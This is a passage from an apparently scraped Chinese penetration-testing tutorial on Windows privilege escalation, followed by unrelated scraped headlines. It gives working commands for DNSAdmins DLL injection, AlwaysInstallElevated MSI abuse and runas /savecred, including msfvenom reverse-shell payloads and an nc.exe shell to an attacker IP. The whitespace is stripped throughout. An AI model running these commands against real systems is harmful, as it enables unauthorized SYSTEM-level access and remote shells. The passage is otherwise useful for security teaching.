PSC:Windowssystem32>scconfigusosvcstart=auto4）启动服务
PSC:Windowssystem32>scstartusosvc按部就班的执行
执行后 ， 设置并开启服务


文章图片


文章图片
DLL注入提权漏洞介绍DLL注入提权是一种利用应用程序错误加载DLL的技术 。 可以使用此技术来实现提权以及持久控制 。
首先 ， 让我们了解应用程序加载DLL的机制 。
DLL代表动态链接库 ， 它是一个库文件 ， 其中包含可被多个应用程序同时动态访问和使用的代码和数据 。 DLL是Microsoft引入的 ， 用于实现共享库的概念 。
漏洞复现如果一个用户是DNSAdmins组成员 ， 可以以管理员权限加载DLL ， 我们可以通过msfvenom来生成一个反弹shell的DLL文件获取管理员权限 。
1.首先查看我们的用户权限 ， 我们的用户在DNSAdmin组里面

文章图片
2.使用msfvenom生成一个反弹shell 。
Msfvenom-pwindows/x64/shell_reverse_tcpLHOST=X.X.X.XLPORT=443-fdll-orev.dll3.在攻击者机器启动smb服务 ， 通过UNC来读取攻击机上生成的DLL文件 。


文章图片
4.在目标机器上调用dnscmd来执行加载远程DLL文件 ， 普通用户执行dnscms可能会失败 。
PSC:Users>dnscmd.exe/config/serverlevelplugindllX.X.X.Xsrev.dllRegistrypropertyserverlevelplugindllsuccessfullyreset.Commandcompletedsuccessfully.PSC:Users>sc.exeresolutestopdnsSERVICE_NAME:dnsTYPE:10WIN32_OWN_PROCESSSTATE:3STOP_PENDING(STOPPABLE,PAUSABLE,ACCEPTS_SHUTDOWN)WIN32_EXIT_CODE:0(0x0)SERVICE_EXIT_CODE:0(0x0)CHECKPOINT:0x1WAIT_HINT:0x7530*SERVICE_NAME:dnsTYPE:10WIN32_OWN_PROCESSSTATE:2START_PENDING(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)5.获取到system权限的shell


文章图片
注册表键提权漏洞介绍AlwaysInstallElevated是一项功能 ， 可为Windows计算机上的所有用户（尤其是低特权用户）提供运行任何具有高权限的MSI文件的功能 。 MSI是基于Microsoft的安装程序软件包文件格式 ， 用于安装 ， 存储和删除程序 。
通过组策略中的windowsinstaller来进行配置 ， 默认情况下该配置是关闭的 。
漏洞复现1.首先需要检查计算机是否开启了该配置 ， 也可以通过执行powerup.ps1来检查权限 。
regqueryHKLMSOFTWAREPoliciesMicrosoftWindowsInstaller/vAlwaysInstallElevatedregqueryHKCUSOFTWAREPoliciesMicrosoftWindowsInstaller/vAlwaysInstallElevated

文章图片
2.使用msfvenom生成一个msi文件用来反弹shell 。
Msfvenom-pwindows/meterpreter/reverse_tcplhost=X.X.X.Xlport=4567-fmsi>1.msi3.安装msi ， 获取反弹shell 。
msiexec/quiet/qn/iC:WindowsTemp1.msi

文章图片
凭证存储漏洞介绍Windows7之后的操作系统提供了windows保险柜功能(WindowsVault),Window保险柜存储Windows可以自动登录用户的凭据 ， 这意味着需要凭据才能访问资源（服务器或网站）的任何Windows应用程序都可以使用此凭据管理器和WindowsVault并使用提供的凭据代替用户一直输入用户名和密码 。
除非应用程序与凭据管理器进行交互 ， 否则我认为它们不可能对给定资源使用凭据 。 因此 ， 如果您的应用程序要使用保管库 ， 则应以某种方式与凭证管理器进行通信 ， 并从默认存储保管库中请求该资源的凭证 。
漏洞复现1.通过cmdkey/list列出存储的所有用户的凭据 ， 发现administrator凭据被存储在了本机上 。


文章图片


文章图片
2.使用runas来以管理员权限启动nc反弹shell
Runas/user:administrator/savecred"nc.exe-ecmd.exeX.X.X.X1337"3.在攻击机启动监听 ， 获取反弹shell 。


文章图片
技术小结在测试项目中 ， 测试人员通常会设法获取shell ， 然后再进行下一步的操作 ， 本文旨在给大家提供一些从普通权限到system权限的思路 ， 基本总结如下：
1.**通过查看内核版本 ， 寻找是否存在可以利用的提权EXP** 。
2.通过信息收集 ， 查看机器配置 ， 账户密码等查看是否可以利用 。
3.**通过查看系统的应用 ， 或者第三方应用 ， 查找服务本身是否存在问题 ， 或者是否配置存在问题 ， 如大家常见的mysql**提权

• 马斯克：全自动驾驶测试版需求量高 将推出下载测试版快速入口
• 红魔6Pro高刷游戏及性能实测：王者吃鸡原神全程高能
• 特斯拉CEO埃隆·马斯克：将在大约10天内将“下载测试版”按钮添加到汽车显示屏服务功能上
• 迷你世界五周年庆猜测！会不会是保护麋鹿？还是保护历史文化？
• ITBD-TWS耳机全球市场数据监测
• 【运势预测】2021年3月7日
• 心理测试：选出你不敢走的拱桥，测出你有什么好运连续不断的奔来
• 心理测试：你最喜欢哪双水晶鞋？测你的白马王子什么时候出现
• 全自动驾驶，续航超600km！大众电动巴士ID. BUZZ测试中！
• 无线投影仪CE认证，无线投影仪EMC测试，传到测试，辐射测试